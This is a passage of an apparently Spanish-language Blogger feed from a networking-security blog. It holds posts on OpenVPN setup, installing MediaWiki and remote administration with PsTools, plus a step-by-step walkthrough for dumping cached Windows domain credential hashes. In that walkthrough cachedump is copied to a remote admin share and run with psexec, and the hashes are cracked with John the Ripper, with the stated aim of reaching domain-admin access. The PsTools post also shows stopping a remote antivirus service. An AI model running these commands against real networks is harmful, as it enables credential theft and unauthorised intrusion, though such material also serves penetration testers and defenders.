[undef]&lt;br /&gt;Sat Dec 31 00:27:15 2011 TCPv4_SERVER link remote: [AF_INET]192.168.1.100:14446&lt;br /&gt;Sat Dec 31 00:27:16 2011 192.168.1.100:14446 [clienteA] Peer Connection Initiated with [AF_INET]192.168.1.100:14446&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Bloqueamos acceso SSH al servidor de openVPN desde la VPN:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# iptables -A INPUT -s 10.8.0.0/24 -p tcp --dport 22 -j DROP&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Habilitamos todo el tráfico desde la ip 10.8.0.6(la ip que nos asignó en este caso) hacia internet conectado en la VPN:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# iptables -t nat -A POSTROUTING -s 10.8.0.6/32 -o eth0 -j MASQUERADE&lt;br /&gt;root@www:~# echo 1 &gt; /proc/sys/net/ipv4/ip_forward&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ahora tenemos el tráfico enrutado por el server VPN, podemos hacer ping a google, conectarnos al msn y navegar por internet:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;C:\Documents and Settings\user&gt;ping www.google.com.ar&lt;br /&gt;Pinging www.l.google.com [74.125.47.99] with 32 bytes of data:&lt;br /&gt;Reply from 74.125.47.99: bytes=32 time=299ms TTL=50&lt;br /&gt;Reply from 74.125.47.99: bytes=32 time=203ms TTL=50&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Vemos las reglas en iptables:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# iptables -L -n -t nat&lt;br /&gt;Chain PREROUTING (policy ACCEPT)&lt;br /&gt;target     prot opt source               destination&lt;br /&gt;&lt;br /&gt;Chain POSTROUTING (policy ACCEPT)&lt;br /&gt;target     prot opt source               destination&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;MASQUERADE  all  --  10.8.0.6             0.0.0.0/0&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Chain OUTPUT (policy ACCEPT)&lt;br /&gt;target     prot opt source               destination&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ponemos en el rc.local el contenido de los comandos que queremos qu ese ejecuten cuando se reinicie el server.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Revocando Certificados de Clientes:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Si deseamos que un cliente no se conecte más a la VPN simplemente revocamos su certificado cno los siguientes comandos:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@www:~# /etc/openvpn/easy-rsa/2.0/vars&lt;br /&gt;root@www:~# /etc/openvpn/easy-rsa/2.0/revoke-full clienteA&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;FUENTES:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://es.wikipedia.org/wiki/OpenVPN"&gt;Wikipedia&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.openvpn.net/index.php/open-source/documentation/howto.html"&gt;OpenVPN.net&lt;/a&gt;&lt;br /&gt;&lt;a href="http://library.linode.com/networking/openvpn/debian-6-squeeze"&gt;library.linode.com&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.ventanazul.com/webzine/articles/openvpn-ubuntu-and-hulu"&gt;www.ventanazul.com&lt;/a&gt;&lt;br /&gt;&lt;a href="http://jroliva.wordpress.com/2007/06/06/howto-instalacion-openvpn-en-debian-etch/"&gt;jroliva.wordpress.com&lt;/a&gt;&lt;br /&gt;&lt;a href="http://diegosamuel.blogspot.com/2007/12/configurar-cliente-openvpn.html"&gt;diegosamuel.blogspot.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-1569722953183406076?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/u6xKeVBtqPaI2E8sdxjYu5r9K6I/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/u6xKeVBtqPaI2E8sdxjYu5r9K6I/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/u6xKeVBtqPaI2E8sdxjYu5r9K6I/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/u6xKeVBtqPaI2E8sdxjYu5r9K6I/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/24h-YHa6xdE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/1569722953183406076/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=1569722953183406076" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/1569722953183406076?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/1569722953183406076?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/24h-YHa6xdE/openvpn-en-debian-squeeze.html" title="OpenVPN en debian Squeeze" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-ZhaO7UW5oMw/Tv6ikW9UEyI/AAAAAAAAAzY/4wq-pYoj4iE/s72-c/01openVPNclientWin.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/openvpn-en-debian-squeeze.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08ARnc7fyp7ImA9WhRWEUw.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-2586101462949745544</id><published>2011-12-28T16:35:00.000-08:00</published><updated>2011-12-28T16:50:47.907-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-28T16:50:47.907-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><title>MediaWiki en Debian Squeeze</title><content type="html">&lt;span style="font-weight:bold;"&gt;Que es MediaWiki?&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;Es un software libre de codigo abierto escrito en php, originalmente usado en Wikipedia.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Instalamos requerimientos (LAMP):&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;apt-get install apache2 php5 mysql-server&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Nos requiere usuario y pass de mysql:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-2h4YeMYv8LI/Tvu2QUK1QCI/AAAAAAAAAvA/uSw8StdDO64/s1600/mysql.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 194px;" src="http://4.bp.blogspot.com/-2h4YeMYv8LI/Tvu2QUK1QCI/AAAAAAAAAvA/uSw8StdDO64/s320/mysql.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5691342945521057826" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Instalamos la wiki:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;apt-get install mediawiki&lt;/blockquote&gt; &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Creamos enlace simbólico:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;ln -s /usr/share/mediawiki/ /var/www/mediawiki&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Accedemos a la página, reemplazamos la ip por la de nuestro equipo:&lt;/span&gt;&lt;br /&gt;&lt;a href="http://192.168.1.100/mediawiki/"&gt;http://192.168.1.100/mediawiki/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Configuramos la Wiki:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;http://192.168.1.100/mediawiki/index.php/P%C3%A1gina_Principal&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Clickeamos en Setup:&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-4-lDctaKJQk/Tvu3RhhMAlI/AAAAAAAAAvM/B6jeAPnKaoU/s1600/01.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 182px;" src="http://4.bp.blogspot.com/-4-lDctaKJQk/Tvu3RhhMAlI/AAAAAAAAAvM/B6jeAPnKaoU/s320/01.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5691344065795981906" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Colocamos el nombre de la Wiki y el correo:&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-1POf1zisv-o/Tvu3vdeU8nI/AAAAAAAAAvY/qeuoWBWJhPE/s1600/02.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 212px;" src="http://3.bp.blogspot.com/-1POf1zisv-o/Tvu3vdeU8nI/AAAAAAAAAvY/qeuoWBWJhPE/s320/02.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5691344580106318450" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Seleccionamos el idioma, la licencia, el usuario y password del administrador:&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-aZ4l5ULlFXY/Tvu4Gm8sJaI/AAAAAAAAAvk/Gvu4hYg3H4Y/s1600/03.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 194px;" src="http://4.bp.blogspot.com/-aZ4l5ULlFXY/Tvu4Gm8sJaI/AAAAAAAAAvk/Gvu4hYg3H4Y/s320/03.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5691344977786578338" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;La siguiente configuración de la Base de Datos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-Ysl3jLzHpWQ/Tvu4Ufi2y-I/AAAAAAAAAvw/ZI9puyPhgQQ/s1600/04.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 130px;" src="http://1.bp.blogspot.com/-Ysl3jLzHpWQ/Tvu4Ufi2y-I/AAAAAAAAAvw/ZI9puyPhgQQ/s320/04.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5691345216317344738" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-Ze0ZwFPSVL0/Tvu4e4dVJ1I/AAAAAAAAAv8/lpVtltgkffI/s1600/05.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 177px;" src="http://2.bp.blogspot.com/-Ze0ZwFPSVL0/Tvu4e4dVJ1I/AAAAAAAAAv8/lpVtltgkffI/s320/05.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5691345394803746642" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Movemos el siguiente archivo y accedemos al link que nos sugiere la imagen:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;mv /var/lib/mediawiki/config/LocalSettings.php /etc/mediawiki/&lt;/blockquote&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-4Pz95TOBECQ/Tvu5Apy7pJI/AAAAAAAAAwI/GqV20VbvdF4/s1600/06.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 18px;" src="http://3.bp.blogspot.com/-4Pz95TOBECQ/Tvu5Apy7pJI/AAAAAAAAAwI/GqV20VbvdF4/s320/06.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5691345974983369874" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-2586101462949745544?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Es1sQtZaIFzSDPFHnjgCkc0u11g/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Es1sQtZaIFzSDPFHnjgCkc0u11g/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Es1sQtZaIFzSDPFHnjgCkc0u11g/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Es1sQtZaIFzSDPFHnjgCkc0u11g/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/AianW5Zpp78" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/2586101462949745544/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=2586101462949745544" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/2586101462949745544?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/2586101462949745544?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/AianW5Zpp78/mediawiki-en-debian-squeeze.html" title="MediaWiki en Debian Squeeze" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-2h4YeMYv8LI/Tvu2QUK1QCI/AAAAAAAAAvA/uSw8StdDO64/s72-c/mysql.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/mediawiki-en-debian-squeeze.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkUCQ3wzeip7ImA9WhRWEEU.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-5161922638688853732</id><published>2011-12-28T06:49:00.000-08:00</published><updated>2011-12-28T06:57:42.282-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-28T06:57:42.282-08:00</app:edited><title>Obtener hashes de Windows Remotamente</title><content type="html">Para realizar esta actividad primero debemos tener acceso de administrador local de la pc remota. &lt;br /&gt;&lt;br /&gt;La pregunta que seguramente se están haciendo en este momento debe ser: Por que motivo voy a obtener los hashes si ya tengo acceso de administrador local?&lt;br /&gt;&lt;br /&gt;La respuesta es simple, puede ser para obtener otras credenciales de usuarios de dominio, nosotros tenemos solo la password del administrador local, el cual no tiene acceso a la VPN. En cambio si obtenemos el hash de un usuario de dominio y lo crackeamos, podriamos tener acceso a la red remotamente.&lt;br /&gt;&lt;br /&gt;Por defecto windows cachea localmente los hashes de usuarios de dominio en el registro, esto lo realiza por si en algun momento el controlador de dominio donde se autentica el usuario no esta disponible. En el caso de una notebook, cuando un usuario la desconecta de la red interna y se la lleva a su casa no podria loguearse con su user ya que no tiene donde validar las credenciales.&lt;br /&gt;&lt;br /&gt;Algo mas interesante seria si un usuario con privilegios de administrador de dominio se hubiese logueado en algun momento en dicha maquina, obtendriamos el hash, lo crackeariamos y si obtenemos exito seriamos admin. del dominio.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;1) Descargamos la herramienta cacheDump desde:&lt;/span&gt; &lt;a href="http://www.hacktoolrepository.com/files/Passwords/CacheDump/cachedump-1.2.zip"&gt;CacheDump&lt;/a&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-weight:bold;"&gt;2) Creamos un archivo cache.bat que contenga dentro lo siguiente:&lt;/span&gt; &lt;br /&gt; &lt;blockquote&gt;c:\cachedump.exe &gt; c:\hash.txt&lt;/blockquote&gt;&lt;br /&gt;    Este bat contiene la ruta del cachedump.exe y la salida de dicha ejecucion (los hashes) la anviara a un archivo llamado &lt;span style="font-weight:bold;"&gt;hash.txt&lt;/span&gt; ubicado en el c:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;3) Accedemos remotamente al disco remoto mediante \\192.168.1.100\c$ y copiamos en el C el cachedump.exe y el cache.bat. Esto podemos hacerlo porque tenemos acceso como admin local de dicha Pc. Si queremos usuar la CLI lo hacemos con xcopy:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt; c:\&gt; xcopy cachedump.exe "\\192.168.1.100\c$"&lt;br /&gt; c:\&gt; xcopy cache.bat "\\192.168.1.100\c$"&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;4) Ejecutamos el cache.bat con psexec (Para uso y descarga de psexec ver el link:&lt;/span&gt; &lt;a href="http://www.redes-seguridad.com.ar/2011/12/ejecutar-tareas-remotamente-pstools.html"&gt;http://www.redes-seguridad.com.ar/2011/12/ejecutar-tareas-remotamente-pstools.html&lt;/a&gt;)&lt;br /&gt;&lt;blockquote&gt; c:\&gt; psexec -s -i -d \\192.168.1.100 c:\cache.bat&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;5) Copiamos el hash.txt del c: remoto a nuestra PC:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt; c:\&gt;xcopy \\192.168.1.100\c$\hash.txt c:\&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;6) Vemos el contenido de los usuarios, los hashes y el dominio:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt; c:\&gt; type hash.txt&lt;br /&gt; user1:A12BC15F401B96733F47912084CDD651:mi-dominio:mi-dominio.com&lt;br /&gt; user2:31765416AFBACB8976563DBFE90155D:mi-dominio:mi-dominio.com&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;7) Ataque de diccionario con John:&lt;/span&gt;&lt;br /&gt; (Para instalarlarlo en linux consultar este link: http://www.redes-seguridad.com.ar/2011/12/cracking-passwd-con-john-ripper.html)&lt;br /&gt;&lt;blockquote&gt;root@morsa:~# john --wordlist=lista.txt -format:mscash hash.txt&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt; &lt;span style="font-weight:bold;"&gt;lista.txt&lt;/span&gt;  =&gt; es un archivo de texto que contiene palabras de diccionario&lt;br /&gt; &lt;span style="font-weight:bold;"&gt;hash.txt&lt;/span&gt; =&gt; es el hash que obtuvimos de la pc atacada&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;8) En cambio si no logramos nada con ataque por diccionario tendremos que hacer uno por fuerza bruta, incremental:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;root@morsa:~# john --incremental -format:mscash hash.txt&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-5161922638688853732?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/RvFo8of6eZeAaxggcOY98DSdglE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/RvFo8of6eZeAaxggcOY98DSdglE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/RvFo8of6eZeAaxggcOY98DSdglE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/RvFo8of6eZeAaxggcOY98DSdglE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/J5YbgNrzjUg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/5161922638688853732/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=5161922638688853732" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/5161922638688853732?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/5161922638688853732?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/J5YbgNrzjUg/obtener-hashes-de-windows-remotamente.html" title="Obtener hashes de Windows Remotamente" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/obtener-hashes-de-windows-remotamente.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0cEQXw9cCp7ImA9WhRWEEU.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-6509857222925157841</id><published>2011-12-27T12:57:00.000-08:00</published><updated>2011-12-28T08:16:40.268-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-28T08:16:40.268-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Windows" /><title>Ejecutar Comandos remotamente (PStools)</title><content type="html">&lt;strong&gt;Descargamos PStool de:&lt;/strong&gt; &lt;a href="http://download.sysinternals.com/Files/PsTools.zip"&gt;http://download.sysinternals.com/Files/PsTools.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Abrimos el notepad.exe en la pc remota con ip 192.168.1.100:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;psexec -s -i -d \\192.168.1.100 notepad&lt;br /&gt;PsExec \\192.168.1.100 -s -i -d notepad.exe c:\prueba.txt (El archivo debe estar en la PC remota)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Instalar impresora remotamente:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;psexec -s -i -d \\nombre-Pc c:\windows\system32\RUNDLL32 PRINTUI.DLL,PrintUIEntry /il&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Abrir pagina web remotamente:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;PsExec \\192.168.1.100 -s -i -d "c:\Program Files\Internet Explorer\iexplore.exe" www.redes-seguridad.com.ar&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Instalar MSN live Messenger remotamente:&lt;/strong&gt;&lt;br /&gt;Copiar el instalador del msn wlsetup-web.exe en la pc destino: \\192.168.1.100\c$&lt;br /&gt;Luego ejecutar el instalador:&lt;br /&gt;&lt;blockquote&gt;PsExec.exe \\nombre_de_PC -s -i -d "c:\wlsetup-web.exe"&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Matar un proceso en la pc 192.168.1.100 indicando el pid (Identificador de Proceso) en este caso es 328:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;pskill \\192.168.1.100 328&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Como obtengo el pid para elegir que matar? Desde pslist:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;pslist \\192.168.1.100 | find "notepad"&lt;br /&gt;notepad             328   8   1   44   1052     0:00:00.078     0:00:10.296&lt;br /&gt;    (PID)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Como saber en que maquinas esta logueado un usuario:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;psloggedon nombreUsuario&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Obtener el SID de usuario o de PC:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;psgetsid nombreUsuario&lt;br /&gt;psgetsid \\nombrePC&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Obtener info de una Pc:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;psinfo \\192.168.1.100&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Listar los procesos en ejecucion en PC remota:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;pslist \\192.168.1.100&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Ver Visor Suceso de Pc remota:&lt;/strong&gt;&lt;br /&gt;&lt;blockquote&gt;psloglist \\192.168.1.100&lt;/blockquote&gt;&lt;br /&gt; &lt;br /&gt;&lt;strong&gt;Lista o cierra archivos abiertos remotamente:&lt;/strong&gt;&lt;blockquote&gt;psfile \\192.168.1.100&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ver estados de los servicios:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;psservice \\192.168.1.100 query&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Verificar en que equipos esta el servicio del Panda Antivirus:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;psservice find PavSrv all&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Detener el Servicio en PC remota:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;psservice \\192.168.1.100 stop nombreServicio&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Detenemos el servicio:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;psservice \\192.168.1.100 stop nombreServicio&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Verificamos si el servicio esta corriendo:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;psservice \\192.168.1.100 query pavsrv&lt;/blockquote&gt;&lt;br /&gt;SERVICE_NAME: PavSrv&lt;br /&gt;DISPLAY_NAME: Panda Antivirus Service&lt;br /&gt;        GROUP             : Anti-Virus&lt;br /&gt;        TYPE              : 10 WIN32_OWN_PROCESS&lt;br /&gt;        STATE             : 1  STOPPED&lt;br /&gt;                               (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)&lt;br /&gt;        WIN32_EXIT_CODE   : 0  (0x0)&lt;br /&gt;        SERVICE_EXIT_CODE : 0  (0x0)&lt;br /&gt;        CHECKPOINT        : 0x0&lt;br /&gt;        WAIT_HINT         : 0 ms&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Volvemos a iniciar el servicio del Panda:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;psservice \\192.168.1.100 start pavsrv&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-6509857222925157841?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/TGcSzJ0iLqi6_VUNJb0tF6z6TtA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/TGcSzJ0iLqi6_VUNJb0tF6z6TtA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
